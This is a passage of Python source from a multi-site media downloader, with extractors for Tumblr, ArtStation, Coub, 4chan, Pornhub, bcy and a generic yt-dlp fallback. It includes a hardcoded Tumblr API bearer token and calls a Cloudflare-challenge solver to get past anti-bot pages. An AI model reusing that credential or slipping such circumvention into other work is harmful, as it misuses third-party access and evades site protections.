'tumblr.com/post/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) self.session = Session() @classmethod def fix_url(cls, url): qs = query_url(url) path = qs.get('redirect_to') if path: url = urljoin('https://tumblr.com', path[0]) id = get_id(url) return 'https://{}.tumblr.com'.format(id) def read(self): username = get_id(self.url) name = get_name(username, self.session) for img in get_imgs(username, self.session, cw=self.cw): self.urls.append(img.url) self.title = clean_title('{} (tumblr_{})'.format(name, username)) class TumblrAPI: _url_base = 'https://www.tumblr.com/api' _hdr = { 'referer': 'https://www.tumblr.com', 'authorization': 'Bearer aIcXSOoTtqrzR8L8YEIOmBeW94c3FmbSNSWAUbxsny9KKx5VFh', } _qs = { 'fields[blogs]': 'name,avatar,title,url,is_adult,?is_member,description_npf,uuid,can_be_followed,?followed,?advertiser_name,is_paywall_on,theme,subscription_plan,?primary,share_likes,share_following,can_subscribe,subscribed,ask,?can_submit,?is_blocked_from_primary,?tweet,?admin,can_message,?analytics_url,?top_tags,paywall_access', 'npf': 'true', 'reblog_info': 'false', 'include_pinned_posts': 'false', #'page_number': None, } def __init__(self, session, cw=None): self.session = session self.cw = cw def print_(self, s): get_print(self.cw)(s) @limits(1) def call(self, path, qs, default_qs=True): if default_qs: qs_new = qs qs = self._qs.copy() qs.update(qs_new) url = self._url_base + path url = update_url_query(url, qs) r = self.session.get(url, headers=self._hdr) data = r.json() errs = data.get('errors', []) if errs: code = int(errs[0]['code']) if code == 0: raise Exception('Not found') elif code == 4012: raise errors.LoginRequired(errs[0]['detail']) r.raise_for_status() return data['response'] def name(self, username): path = '/v2/blog/{}/posts'.format(username) data = self.call(path, {}) return data['blog']['title'] or data['blog']['name'] def posts(self, username): path = '/v2/blog/{}/posts'.format(username) qs = {} ids = set() default_qs = True while True: check_alive(self.cw) data = self.call(path, qs, default_qs=default_qs) for post in (post for post in data['posts'] if post['object_type'] != 'backfill_ad'): id_ = post['id'] if id_ in ids: self.print_('duplicate: {}'.format(id_)) continue ids.add(id_) url = 'https://{}.tumblr.com/post/{}'.format(username, id_) yield Post(post, url, self.cw) try: links = data.get('links') or data['_links'] path_next = links['next']['href'] except: path_next = None if path_next: path = path_next default_qs = False else: break class Post: def __init__(self, data, url, cw=None): id_ = data['id'] self.imgs = [] cs = data['content'] for trail in data['trail']: cs += trail['content'] for c in cs: if c['type'] in ['image', 'video']: media = c.get('media') if not media: #2859 continue if isinstance(media, list): media = media[0] img = media['url'] self.imgs.append(Image(img, id_, url, len(self.imgs), cw)) elif c['type'] in ['text', 'link', 'audio']: continue else: raise NotImplementedError(id_, c) def get_name(username, session): return TumblrAPI(session).name(username) def get_imgs(username, session, cw=None): artist = get_name(username, session) imgs = [] max_pid = get_max_range(cw) api = TumblrAPI(session, cw) for post in api.posts(username): check_alive(cw) imgs += post.imgs s = '{} {} (tumblr_{}) - {}'.format(tr_('읽는 중...'), artist, username, len(imgs)) if cw: cw.setTitle(s) else: print(s) if len(imgs) > max_pid: break return imgs[:max_pid] def get_id(url): if '/dashboard/blog/' in url: url = re.find('/dashboard/blog/([0-9a-zA-Z_-]+)', url) if '/login_required/' in url: url = url.split('/login_required/')[1].split('?')[0].split('/')[0] if 'tumblr.com/blog/view/' in url: url = url.split('tumblr.com/blog/view/')[1] if 'tumblr.com' in url: qs = query_url(url) url_ = qs.get('url') if url_: return get_id(url_) id = url.split('tumblr.com')[0].split('/')[-1].strip('.') if id == 'www': url = re.find(r'tumblr\.com/([^/#?]+)', url, err='no id') #6333 else: url = id return url File: src/extractor/artstation_downloader.py #coding:utf8 import downloader from error_printer import print_error from translator import tr_ from utils import Downloader, Soup, get_print, lazy, Session, try_n, File, clean_title, check_alive, get_ext, get_max_range import dateutil.parser import utils class File_artstation(File): type = 'artstation' format = '[date] name_ppage' c_alter = 0 def alter(self): #6401 self.c_alter += 1 if self.c_alter % 2 == 0: url = self['url'] else: url = self['url'].replace('/4k/', '/large/') return url class Downloader_artstation(Downloader): type = 'artstation' URLS = ['artstation.com'] display_name = 'ArtStation' ACCEPT_COOKIES = [r'(.*\.)?artstation\.(com|co)'] url_main = None @try_n(8) def init(self): # 3849 self.session = Session() import clf2 clf2.solve(self.url, self.session, self.cw) _ = self._id.replace('artstation_', '', 1) self.url_main = f'https://www.artstation.com/{_}' if '/artwork/' in self.url or '/projects/' in self.url: pass else: self.url = self.url_main self.print_(self.url) @classmethod def fix_url(cls, url): #6516 if '.artstation.com' in url: sub = url.split('.artstation.com')[0].split('/')[-1] if sub != 'www': url = f'https://www.artstation.com/{sub}' return url @lazy def _id(self): _id = get_id(self.url, self.cw) return f'artstation_{_id}' @lazy @try_n(2) def name(self): soup = downloader.read_soup(self.url_main, session=self.session) name = soup.find('meta', {'property': 'og:title'}).attrs['content'] return clean_title(f'{name} ({self._id})') def read(self): self.title = self.name id_ = self._id.replace('artstation_', '', 1) if '/' in id_: id_ = id_.split('/')[0] if '/artwork/' in self.url or '/projects/' in self.url: id_art = get_id_art(self.url) imgs = get_imgs_page(id_art, self.session, cw=self.cw) else: imgs = get_imgs(id_, self.title, self.session, cw=self.cw) for img in imgs: self.urls.append(img) self.title = self.name @try_n(2) def get_imgs(id_, title, session, cw=None): print_ = get_print(cw) referer = f'https://www.artstation.com/{id_}' downloader.read_html(referer, session=session) #print(session.cookies.keys()) url = f'https://www.artstation.com/users/{id_}/quick.json' j = downloader.read_json(url, referer, session=session) uid = j['id'] datas = [] ids = set() for p in range(1, 1000): check_alive(cw) url = f'https://www.artstation.com/users/{id_}/projects.json??user_id={uid}&page={p}' #6516 j = try_n(4)(downloader.read_json)(url, referer, session=session) data = j['data'] if not data: break for d in data: if d['id'] not in ids: ids.add(d['id']) datas.append(d) if cw: cw.setTitle(f'{tr_("페이지 읽는 중...")} {title} - {len(datas)}') else: print(len(datas)) datas = sorted(datas, key=lambda data: int(data['id']), reverse=True) imgs = [] i = 0 names = set() while i < len(datas): check_alive(cw) data = datas[i] date = data['created_at'] post_url = data['permalink'] #print('post_url', post_url) id_art = get_id_art(post_url) imgs += get_imgs_page(id_art, session, date=date, cw=cw, names=names) if len(imgs) >= get_max_range(cw): break if cw: cw.setTitle(f'{tr_("이미지 읽는 중...")} {title} - {i+1} / {len(datas)} ({len(imgs)})') else: print(len(imgs)) i += 1 return imgs def get_id_art(post_url): return post_url.split('/artwork/')[-1].split('/projects/')[-1].split('/')[0].split('?')[0].split('#')[0] def get_id(url, cw=None): print_ = get_print(cw) url = url.split('?')[0].split('#')[0] if '/artwork/' in url: id_art = get_id_art(url) imgs = get_imgs_page(id_art, session=Session(), cw=cw) return imgs[0].data['user']['username'] if '.artstation.' in url and 'www.artstation.' not in url: id_ = url.split('.artstation')[0].split('//')[-1] type_ = None elif 'artstation.com' in url: paths = url.split('artstation.com/')[1].split('/') id_ = paths[0] type_ = paths[1] if len(paths) > 1 else None else: id_ = url.replace('artstation_', '').replace('/', '/') type_ = None if type_ not in [None, 'likes']: type_ = None print_(f'type: {type_}, id: {id_}') if type_: return f'{id_}/{type_}' return id_ def get_imgs_page(id_art, session, date=None, cw=None, names=None): print_ = get_print(cw) url_json = f'https://www.artstation.com/projects/{id_art}.json' post_url = f'https://www.artstation.com/artwork/{id_art}' name = post_url.strip('/').split('/')[-1] if names is not None: while name.lower() in names: name += '_' names.add(name.lower()) try: data = downloader.read_json(url_json, session=session, referer=post_url) imgs_ = data['assets'] except Exception as e: print_(print_error(e)) return [] if date is None: date = data['created_at'] date = dateutil.parser.parse(date) imgs = [] for page, img in enumerate(imgs_): if not img['has_image']: print('no img') continue url = None embed = img.get('player_embedded') if embed: soup = Soup(embed) url_embed = soup.find('iframe').attrs['src'] print_(f'embed: {url_embed}') try: soup = downloader.read_soup(url_embed, post_url, session=session) v = soup.find('video') if v: url = v.find('source').attrs['src'] except Exception as e: print_(print_error(e)) if not url: try: url = soup.find('link', {'rel': 'canonical'}).attrs['href'] print_(f'YouTube: {url}') raise Exception('YouTube') except Exception as e: print(e) url = None if not url: url = img['image_url'] d = { 'date': date, 'name': clean_title(name), 'page': page, } filename = utils.format('artstation', d, get_ext(url)) img = File_artstation({'referer':post_url, 'url':url.replace('/large/', '/4k/'), 'name': filename}) img.data = data imgs.append(img) return imgs File: src/extractor/coub_downloader.py from utils import Downloader, LazyUrl, try_n, format_filename, get_ext import ytdl from io import BytesIO as IO import downloader import ree as re PATTEN_IMAGIZER = r'coub-com-.+\.imagizer\.com' def get_id(url): return re.find(r'/view/([0-9a-z]+)', url, err='no id') class Downloader_coub(Downloader): type = 'coub' URLS = ['coub.com', r'regex:'+PATTEN_IMAGIZER] single = True ACCEPT_COOKIES = [r'(.*\.)?coub\.com'] @classmethod def fix_url(cls, url): return re.sub(PATTEN_IMAGIZER, 'coub.com', url) @classmethod def key_id(cls, url): return get_id(url) def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self, pp=self.pp) self.cw = cw @try_n(2) def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['ext'] == 'mp4'] f = sorted(fs, key=lambda f: int(f.get('filesize', 0)))[-1] self._url = f['url'] ## fs = [f for f in info['formats'] if f['ext'] == 'mp3'] ## self.f_audio = sorted(fs, key=lambda f: int(f.get('filesize', 0)))[-1] self.thumb_url = info['thumbnails'][0]['url'] self.thumb = IO() downloader.download(self.thumb_url, buffer=self.thumb) self.title = info['title'] ext = get_ext(self._url) self.filename = format_filename(self.title, info['id'], ext) return self._url def pp(self, filename): ## import ffmpeg ## f = IO() ## downloader.download(self.f_audio['url'], buffer=f) ## ffmpeg.merge(filename, f) return filename File: src/extractor/etc_downloader.py import downloader import ytdl from utils import Downloader, Session, try_n, LazyUrl, get_ext, format_filename, get_print, get_resolution from io import BytesIO import ree as re from m3u8_tools import playlist2stream, M3u8_stream import utils import ffmpeg import clf2 import os class Downloader_etc(Downloader): type = 'etc' URLS = ['thisvid.com'] #5153 single = True MAX_PARALLEL = 8 display_name = 'Etc' PRIORITY = 10 def init(self): self.session = Session() name = ytdl.get_extractor_name(self.url) self.print_('extractor: {}'.format(name)) if name == 'ixigua': #6290 clf2.solve(self.url, session=self.session) #if name == 'generic': # raise NotImplementedError() def read(self): video = get_video(self.url, self.session, self.cw) if video.artist: self.artist = video.artist self.urls.append(video.url) self.print_('url_thumb: {}'.format(video.url_thumb)) self.setIcon(video.thumb) if video.header.lower() not in ['yourporn', 'spankbang']: self.enableSegment()# if isinstance(video.url(), M3u8_stream): self.disableSegment() self.title = os.path.splitext(video.filename)[0].replace(':', ':') def int_or_none(s): try: return int(s) except: return None def format_(f): if f is None: return 'None' return 'format:{} - resolution:{} - vbr:{} - audio:{} - url:{}'.format(f['format'], f['_resolution'], f['_vbr'], f['_audio'], f['url']) class UnSupportedError(Exception):pass def get_video(url, session, cw, ie_key=None): print_ = get_print(cw) try: video = _get_video(url, session, cw, ie_key, allow_m3u8=True) if isinstance(video, Exception): raise video if isinstance(video.url(), M3u8_stream): c = video.url().segs[0].download(2, cw) if not c: raise Exception('invalid m3u8') return video except Exception as e: if isinstance(e, UnSupportedError): raise e print_(e) return _get_video(url, session, cw, ie_key, allow_m3u8=False) @try_n(4) def _get_video(url, session, cw, ie_key=None, allow_m3u8=True): print_ = get_print(cw) print_('get_video: {}, {}'.format(allow_m3u8, url)) options = { 'noplaylist': True, #'extract_flat': True, 'playlistend': 1, 'writesubtitles': True, } if ytdl.get_extractor_name(url) == 'spankbang': options['legacyserverconnect'] = True #6545 ydl = ytdl.YoutubeDL(options, cw=cw) try: info = ydl.extract_info(url) except Exception as e: if 'ERROR: Unsupported URL' in str(e): return UnSupportedError(str(e)) raise e if not ie_key: ie_key = ytdl.get_extractor_name(url) info['ie_key'] = ie_key url_new = info.get('url') formats = info.get('formats', []) if not formats and (info.get('entries') or 'title' not in info): if 'entries' in info: entry = info['entries'][0] url_new = entry.get('url') or entry['webpage_url'] if url_new != url: return get_video(url_new, session, cw, ie_key=get_ie_key(info)) session.headers.update(info.get('http_headers', {})) #session.cookies.update(ydl.cookiejar) if not formats: if url_new: f = {'url': url_new, 'format': ''} formats.append(f) fs = [] for i, f in enumerate(formats): f['_index'] = i f['_resolution'] = int_or_none(re.find(r'([0-9]+)p', f['format'], re.I)) or f.get('height') or f.get('width') or int_or_none(f.get('quality')) or int(f.get('vcodec', 'none') != 'none') #5995 f['_vbr'] = f.get('vbr') or 0 f['_audio'] = f.get('abr') or f.get('asr') or int(f.get('acodec', 'none') != 'none') print_(format_(f)) fs.append(f) #4773 res = max(get_resolution(), min(f['_resolution'] for f in fs)) print_(f'res: {res}') fs = [f for f in fs if f['_resolution'] <= res] if not fs: raise Exception('No videos') def filter_f(fs): for f in fs: if allow_m3u8: return f ext = get_ext_(f['url'], session, url) if ext.lower() != '.m3u8': return f print_('invalid url: {}'.format(f['url'])) return list(fs)[0]# f_video = filter_f(sorted(fs, key=lambda f:(f['_resolution'], int(bool(f['_audio'])), f['_vbr'], f['_index']), reverse=True)) #6072, #6118 print_('video0: {}'.format(format_(f_video))) if f_video['_audio']: f_audio = None else: fs_audio = sorted([f_audio for f_audio in fs if (not f_audio['_resolution'] and f_audio['_audio'])], key=lambda f:(f['_audio'], f['_vbr'], f['_index'])) if fs_audio: f_audio = fs_audio[-1] else: try: print_('trying to get f_video with audio') f_video = filter_f(reversed(sorted([f for f in fs if f['_audio']], key=lambda f:(f['_resolution'], f['_index'])))) except Exception as e: print_('failed to get f_video with audio: {}'.format(e)) f_audio = None print_('video: {}'.format(format_(f_video))) print_('audio: {}'.format(format_(f_audio))) video = Video(f_video, f_audio, info, session, url, cw=cw) return video def get_ie_key(info): ie_key = info.get('ie_key') or info['extractor'] ie_key = ie_key.split(':')[0] if ie_key.lower().endswith('playlist'): ie_key = ie_key[:-len('playlist')] return ie_key def get_ext_(url, session, referer): try: ext = downloader.get_ext(url, session, referer) except Exception as e: ext = get_ext(url) return ext class Video: live = False def __init__(self, f, f_audio, info, session, referer, cw=None): self.f_audio = f_audio self.cw = cw self.title = title = info['title'] self.id = info['id'] self.url = f['url'] self.artist = info.get('uploader') self.header = utils.capitalize(get_ie_key(info)) self.session = session self.referer = referer self.subs = ytdl.get_subtitles(info) self.url_thumb = info.get('thumbnail') self.thumb = BytesIO() if self.url_thumb: downloader.download(self.url_thumb, referer=referer, buffer=self.thumb, session=session) ext = get_ext_(self.url, session, referer) def foo(): hdr = session.headers.copy() if referer: hdr['Referer'] = referer self.live = True return utils.LiveStream(self.url, headers=hdr, fragments=f.get('fragments') if ytdl.LIVE_FROM_START.get('etc') else None) if not ext: if f['_resolution']: ext = '.mp4' else: ext = '.mp3' if ext.lower() == '.m3u8': res = get_resolution() #4773 if info.get('live_status') == 'is_live': url = foo() else: try: url = playlist2stream(self.url, referer, session=session, n_thread=4) except: url = M3u8_stream(self.url, referer=referer, session=session, n_thread=4) if url.live is not None: #5110 url = foo() ext = '.mp4' elif ext.lower() == '.mpd': # TVer url = foo() ext = '.mp4' else: url = self.url self.url = LazyUrl(referer, lambda x: url, self, pp=self.pp) info_ext = info.get('ext') if info_ext == 'unknown_video': #vk info_ext = None self.filename = format_filename(title, self.id, info_ext or ext, header=self.header, live=self.live) def pp(self, filename): if self.f_audio: f = BytesIO() downloader.download(self.f_audio['url'], buffer=f, referer=self.referer, session=self.session) ffmpeg.merge(filename, f, cw=self.cw) utils.pp_subtitle(self, filename, self.cw) return filename File: src/extractor/_4chan_downloader.py import downloader from utils import Downloader, File, clean_title, urljoin, get_ext, limits import utils class File_4chan(File): type = '4chan' format = 'page:04;' @limits(.5) def get(self): return {} class Downloader_4chan(Downloader): type = '4chan' URLS = [r'regex:boards.(4chan|4channel).org'] MAX_CORE = 4 display_name = '4chan' ACCEPT_COOKIES = [r'(.*\.)?(4chan|4channel)\.org'] @classmethod def fix_url(cls, url): return url.split('#')[0] def read(self): soup = downloader.read_soup(self.url) for div in soup.findAll('div', class_='fileText'): href = urljoin(self.url, div.a['href']) d = { 'page': len(self.urls), } file = File_4chan({'url': href, 'referer': self.url, 'name': utils.format('4chan', d, get_ext(href))}) self.urls.append(file) board = self.url.split('/')[3] title = soup.find('span', class_='subject').text id_ = int(self.url.split('/thread/')[1].split('/')[0]) self.title = clean_title(f'[{board}] {title} ({id_})') File: src/extractor/pornhub_downloader.py #coding:utf8 ''' Pornhub Downloader ''' from io import BytesIO import downloader import ree as re from utils import (Downloader, Soup, try_n, LazyUrl, urljoin, get_print, Session, get_max_range, filter_range, get_ext, format_filename, clean_title, get_resolution, check_alive) import clf2 import utils from m3u8_tools import playlist2stream, M3u8_stream import errors from error_printer import print_error import ytdl class File: ''' File ''' _thumb = None def __init__(self, id_, title, url, url_thumb, artist=''): self.id_ = id_ self.title = clean_title(f'{title}') self.url = url ext = get_ext(self.url) if ext.lower() == '.m3u8': try: self.url = playlist2stream(self.url, n_thread=4) except: self.url = M3u8_stream(self.url, n_thread=4) self.url_thumb = url_thumb if ext.lower() == '.m3u8': ext = '.mp4' self.filename = format_filename(self.title, self.id_, ext, artist=artist) def thumb(self): if self._thumb is None: f = BytesIO() downloader.download(self.url_thumb, buffer=f) self._thumb = f else: f = self._thumb f.seek(0) return f class Video: ''' Video ''' _url = None filename = None thumb = None def __init__(self, url, cw, session): url = Downloader_pornhub.fix_url(url) self.url = LazyUrl(url, self.get, self) self.cw = cw self.session = session @try_n(2) def get(self, url): ''' get ''' cw = self.cw session = self.session print_ = get_print(cw) if self._url: return self._url id_ = re.find(r'viewkey=(\w+)', url, re.I) or \ re.find(r'/embed/(\w+)', url, re.I) print_('id: {}'.format(id_)) if 'viewkey=' not in url.lower() and '/gif/' not in url.lower(): if id_ is None: raise Exception('no id') url = urljoin(url, '/view_video.php?viewkey={}'.format(id_)) url_test = url.replace('pornhubpremium.com', 'pornhub.com') try: html = downloader.read_html(url_test, session=session) soup = Soup(html) if soup.find('div', id='lockedPlayer'): print_('Locked player') raise Exception('Locked player') url = url_test except Exception as e: #3511 print_(print_error(e)) url = url.replace('pornhub.com', 'pornhubpremium.com') html = downloader.read_html(url, session=session) soup = Soup(html) soup = fix_soup(soup, url, session, cw) html = soup.html # removed if soup.find('div', class_='removed'): raise Exception('removed') gif = soup.find('div', {'id': 'gifImageSection'}) if gif: print_('GIF') id_ = url.split('/gif/')[1] id_ = re.findall('[0-9a-zA-Z]+', id_)[0] jss = list(gif.children) for js in jss: if 'data-mp4' in getattr(js, 'attrs', {}): break else: raise Exception('gif mp4 url not found') title = js['data-gif-title'] url = js['data-mp4'] url_thumb = re.find(r'https?://.+?.phncdn.com/pics/gifs/.+?\.jpg', html, err='no thumb') file = File('gif_{}'.format(id_), title, url, url_thumb) else: if id_ is None: raise Exception('no id') print_('Video') # 1968 title = soup.find('h1', class_='title') for item in title.findAll(class_='phpFree'): item.decompose() title = title.text.strip() #4940 artist = soup.find('div', class_='userInfo').find('div', class_='usernameWrap').text.strip() ydl = ytdl.YoutubeDL(cw=cw) info = ydl.extract_info(url) session.headers.update(info.get('http_headers', {})) fs = [] for f in info['formats']: f['quality'] = f.get('height') or 0 if f['protocol'].startswith('m3u8'): f['quality'] -= 1 if 'dash' in f['protocol'].lower(): #5554 continue print_('[{}p] {} {}'.format(f['height'], f['protocol'], f['url'])) fs.append(f) if not fs: raise Exception('No formats') fs = sorted(fs, key=lambda f: f['quality']) res = get_resolution() fs_good = [f for f in fs if f['quality'] <= res] if fs_good: f = fs_good[-1] else: f = fs[0] print_('\n[{}p] {} {}'.format(f['height'], f['protocol'], f['url'])) file = File(id_, title, f['url'], info['thumbnail'], artist) self._url = file.url self.title = file.title self.filename = file.filename self.thumb = file.thumb return self._url def is_login(session, cw=None, n=2): ''' is_login ''' print_ = get_print(cw) print_('is_login {}'.format(n)) if n <= 0: return False url = 'https://www.pornhubpremium.com' soup = downloader.read_soup(url, session=session) soup = fix_soup(soup, url, session, cw) if soup.find('ul', id='profileMenuDropdown'): return True return is_login(session, cw, n-1) class Downloader_pornhub(Downloader): ''' Downloader ''' type = 'pornhub' single = True strip_header = False URLS = ['pornhub.com', 'pornhubpremium.com', 'pornhubthbh7ap3u.onion'] ACCEPT_COOKIES = [r'.*(pornhub|phncdn|pornhubpremium).*'] #6181 @classmethod def fix_url(cls, url): if 'pornhub_gif_' in url: url = 'https://www.pornhub.com/gif/{}'.format( url.replace('pornhub_gif_', '')) elif 'pornhub_album_' in url: url = 'https://www.pornhub.com/album/{}'.format( url.replace('pornhub_album_', '')) elif 'pornhub_' in url: url = 'https://www.pornhub.com/view_video.php?viewkey={}'\ .format(url.replace('pornhub_', '')) if '/authenticate/goToLoggedIn' in url: qs = utils.query_url(url) url = urljoin(url, qs['url'][0]) url = url.replace('pornhubthbh7ap3u.onion', 'pornhub.com') return url @classmethod def key_id(cls, url): for domain in cls.URLS: if domain in url: id_ = domain + url.split(domain)[1] break else: raise Exception('no id') return id_.split('#')[0] @try_n(2) def read(self): cw = self.cw session = self.session = Session() # 1791 self.purge_cookies() session.cookies.update({ 'age_verified': '1', 'accessAgeDisclaimerPH': '1', 'accessPH': '1', }) #6124 if 'pornhubpremium.com' in self.url.lower() and\ not is_login(session, cw): raise errors.LoginRequired(method='browser', url='https://www.pornhubpremium.com/premium/login') videos = [] tab = ''.join(self.url.replace('pornhubpremium.com', 'pornhub.com', 1).split('?')[0].split('#')[0].split('pornhub.com/')[-1].split('/')[2:3]) if '/album/' in self.url: self.print_('Album') info = read_album(self.url, session=session) self.single = False for photo in info['photos']: self.urls.append(photo.url) self.title = clean_title(info['title']) elif '/photo/' in self.url: self.print_('Photo') info = read_photo(self.url, session=session) self.urls.append(info['photo'].url) self.title = info['title'] elif tab not in ['', 'videos']: raise NotImplementedError(tab) elif 'viewkey=' not in self.url.lower() and\ '/embed/' not in self.url.lower() and\ '/gif/' not in self.url.lower(): self.print_('videos') info = get_videos(self.url, session, cw) hrefs = info['hrefs'] self.print_('videos: {}'.format(len(hrefs))) if not hrefs: raise Exception('no hrefs') videos = [Video(href, cw, session) for href in hrefs] video = self.process_playlist(info['title'], videos) self.setIcon(video.thumb()) self.enableSegment() else: video = Video(self.url, cw, session) video.url() self.urls.append(video.url) self.setIcon(video.thumb()) self.title = video.title self.enableSegment() def fix_soup(soup, url, session=None, cw=None): ''' fix_soup ''' print_ = get_print(cw) if soup.find('div', class_='logo'): return soup print_('invalid soup: {}'.format(url)) res = clf2.solve(url, session=session, cw=cw) session.purge(Downloader_pornhub.ACCEPT_COOKIES) return Soup(res['html']) class Photo_lazy: ''' Photo_lazy ''' def __init__(self, url, session): self._session = session self.url = LazyUrl(url, self.get, self) def get(self, url): info = read_photo(url, self._session) photo = info['photo'] url = photo.url() self.filename = photo.filename return url class Photo: ''' Photo ''' def __init__(self, url, referer, id_, session): self._session = session ext = get_ext(url) self.filename = f'{id_}{ext}' self.url = LazyUrl(referer, lambda _: url, self) @try_n(8) def read_album(url, session=None): ''' read_album ''' photos = [] soup = downloader.read_soup(url, session=session) id_album = re.find('/album/([0-9]+)', url, err='no album id') for block in soup.findAll('div', class_='photoAlbumListBlock'): href = block.a.attrs['href'] href = urljoin(url, href) photo = Photo_lazy(href, session) photos.append(photo) info = {} title = soup.find('h1', class_='photoAlbumTitleV2').text info['title'] = format_filename(title, f'album_{id_album}') info['photos'] = photos return info @try_n(8) def read_photo(url, session=None): ''' read_photo ''' id_ = re.find('/photo/([0-9]+)', url, err='no photo id') soup = downloader.read_soup(url, session=session) section = soup.find('div', id='photoImageSection') photo = section.find('img')['src'] info = {} info['photo'] = Photo(photo, url, id_, session) title = soup.find('h1').text info['title'] = format_filename(title, f'photo_{id_}') return info @try_n(4) def get_videos(url, session, cw=None): ''' get_videos ''' print_ = get_print(cw) if '/users/' in url: mode = 'users' username = url.split('/users/')[1].split('/')[0] elif '/pornstar/' in url: mode = 'pornstar' username = url.split('/pornstar/')[1].split('/')[0] elif '/model/' in url: mode = 'model' username = url.split('/model/')[1].split('/')[0] elif '/channels/' in url: mode = 'channels' username = url.split('/channels/')[1].split('/')[0] elif '/playlist/' in url: mode = 'playlist' username = url.split('/playlist/')[1].split('/')[0] else: raise Exception('Not supported url') username = username.split('?')[0].split('#')[0] domain = utils.domain(url) if mode in ['pornstar']: url_main = 'https://{}/{}/{}'.format(domain, mode, username) html = downloader.read_html(url_main, session=session) soup = Soup(html) soup = fix_soup(soup, url_main, session, cw) for a in soup.findAll('a'): if '/{}/{}/videos/upload'.format(mode, username) in a.attrs.get('href', ''): free = True break else: free = False print_('free: {}'.format(free)) # Range max_pid = get_max_range(cw) html = downloader.read_html(url, session=session) soup = fix_soup(Soup(html), url, session, cw) info = {} # get title h1 = soup.find('h1') if h1: header = 'Playlist' title = h1.parent.find(id='watchPlaylist') else: title = None if not title: header = 'Channel' profile = soup.find('div', class_='profileUserName') wrapper = soup.find('div', class_='titleWrapper') bio = soup.find('div', class_='withBio') title = soup.find('h1', {'itemprop':'name'}) if not title and profile: title = profile.a if not title and wrapper: title = wrapper.h1 if not title and bio: title = bio.h1 if not title: raise Exception('No title') #print(title) info['title'] = '[{}] {}'.format(header, title.text.strip()) token = re.find('''token *= *['"](.*?)['"]''', html) print_('token: {}'.format(token)) # get links hrefs = [] fail = 0 for p in range(1, 1+100): check_alive(cw) try: if mode in ['users', 'model']: if mode == 'users': url_api = 'https://{}/users/{}/videos/public/'\ 'ajax?o=mr&page={}'.format(domain, username, p) elif mode == 'model': url_api = 'https://{}/model/{}/videos/upload/'\ 'ajax?o=mr&page={}'.format(domain, username, p) r = session.post(url_api) soup = Soup(r.text) if soup.find('h1'): print('break: h1') break elif mode in ['pornstar']: if free: url_api = 'https://{}/{}/{}/videos/upload'\ '?page={}'.format(domain, mode, username, p) soup = downloader.read_soup(url_api, session=session) soup = fix_soup(soup, url_api, session, cw) soup = soup.find('div', class_='videoUList') else: url_api = 'https://{}/{}/{}?page={}'.format(domain, mode, username, p) soup = downloader.read_soup(url_api, session=session) soup = fix_soup(soup, url_api, session, cw) soup = soup.find('ul', class_='pornstarsVideos') elif mode in ['channels']: url_api = 'https://{}/{}/{}/videos?page={}'.format(domain, mode, username, p) soup = downloader.read_soup(url_api, session=session) soup = fix_soup(soup, url_api, session, cw) try: soup = soup.find('div', {'id': 'channelsBody'}).find('div', class_='rightSide') except: break elif mode in ['playlist']: #url_api = 'https://{}/playlist/viewChunked?id={}&offset={}&itemsPerPage=40'.format(domain, username, len(hrefs)) if token is None: raise Exception('no token') url_api = 'https://{}/playlist/viewChunked?id={}&token={}&page={}'.format(domain, username, token, p) soup = downloader.read_soup(url_api, session=session) else: raise NotImplementedError(mode) fail = 0 except Exception as e: print_(e) fail += 1 if fail < 2: continue else: break finally: print_('{} ({})'.format(url_api, len(hrefs))) lis = soup.findAll('li', class_='videoblock') if not lis: print_('break: no lis') break if getattr(soup.find('title'), 'text', '').strip() == 'Page Not Found': print_('Page Not Found') break c = 0 for li in lis: a = li.find('a') href = a.attrs['href'] href = urljoin(url, href) if href in hrefs: continue c += 1 if href.startswith('javascript:'): # Remove Pornhub Premium print(href) continue hrefs.append(href) if c == 0: print('c==0') break print(c) # 1320 if len(hrefs) >= max_pid: break if cw: hrefs = filter_range(hrefs, cw.range) cw.fped = True info['hrefs'] = hrefs[:max_pid] return info File: src/extractor/bcy_downloader.py #coding:utf8 import downloader from utils import Soup, cut_pair, LazyUrl, Downloader, get_print, get_max_range, try_n, clean_title, check_alive, json import os from translator import tr_ class Downloader_bcy(Downloader): type = 'bcy' URLS = ['bcy.net/item/detail/', 'bcy.net/u/'] MAX_CORE = 8 display_name = '半次元' ACCEPT_COOKIES = [r'(.*\.)?bcy\.net'] def init(self): self.html = downloader.read_html(self.url) self.info = get_info(self.url, self.html) @property def name(self): info = self.info if '/detail/' in self.url: title = '{} (bcy_{}) - {}'.format(clean_title(info['artist']), info['uid'], info['id']) else: title = '{} (bcy_{})'.format(clean_title(info['artist']), info['uid']) return title def read(self): imgs = get_imgs(self.url, self.html, cw=self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name self.artist = self.info['artist'] def get_ssr_data(html): s = html.split('window.__ssr_data = JSON.parse("')[1].replace('\\"', '"') s = cut_pair(s).replace('"', '\\"') data = json.loads(json.loads('"{}"'.format(s))) return data @try_n(2) def get_imgs(url, html=None, cw=None): if '/detail/' not in url: return get_imgs_channel(url, html, cw) if html is None: html = downloader.read_html(url) data = get_ssr_data(html) multi = data['detail']['post_data']['multi'] imgs = [] for m in multi: path = m['original_path'] img = json.loads('"{}"'.format(path)) img = Image_single(img, url, len(imgs)) imgs.append(img) return imgs class Image_single: def __init__(self, url ,referer, p): self._url = url self.p = p self.url = LazyUrl(referer, self.get, self) def get(self, referer): ext = get_ext(self._url, referer) self.filename = '{:04}{}'.format(self.p, ext) return self._url class Image: def __init__(self, url, referer, id, p): self.id = id self.p = p self._url = url self.url = LazyUrl(referer, self.get, self) def get(self, referer): ext = get_ext(self._url, referer) self.filename = '{}_p{}{}'.format(self.id, self.p, ext) return self._url def get_ext(url, referer=None): ext = os.path.splitext(url.split('?')[0].replace('~noop.image', ''))[1] if ext in ['.image', '']: ext = downloader.get_ext(url, referer=referer) return ext def get_info(url, html): soup = Soup(html) info = {} uname = soup.find('div', class_='user-name') or soup.find('p', class_='uname') or soup.find('div', class_='user-info-name') info['artist'] = uname.text.strip() j = get_ssr_data(html) if '/detail/' in url: info['uid'] = j['detail']['detail_user']['uid'] info['id'] = j['detail']['post_data']['item_id'] else: info['uid'] = j['homeInfo']['uid'] return info def get_imgs_channel(url, 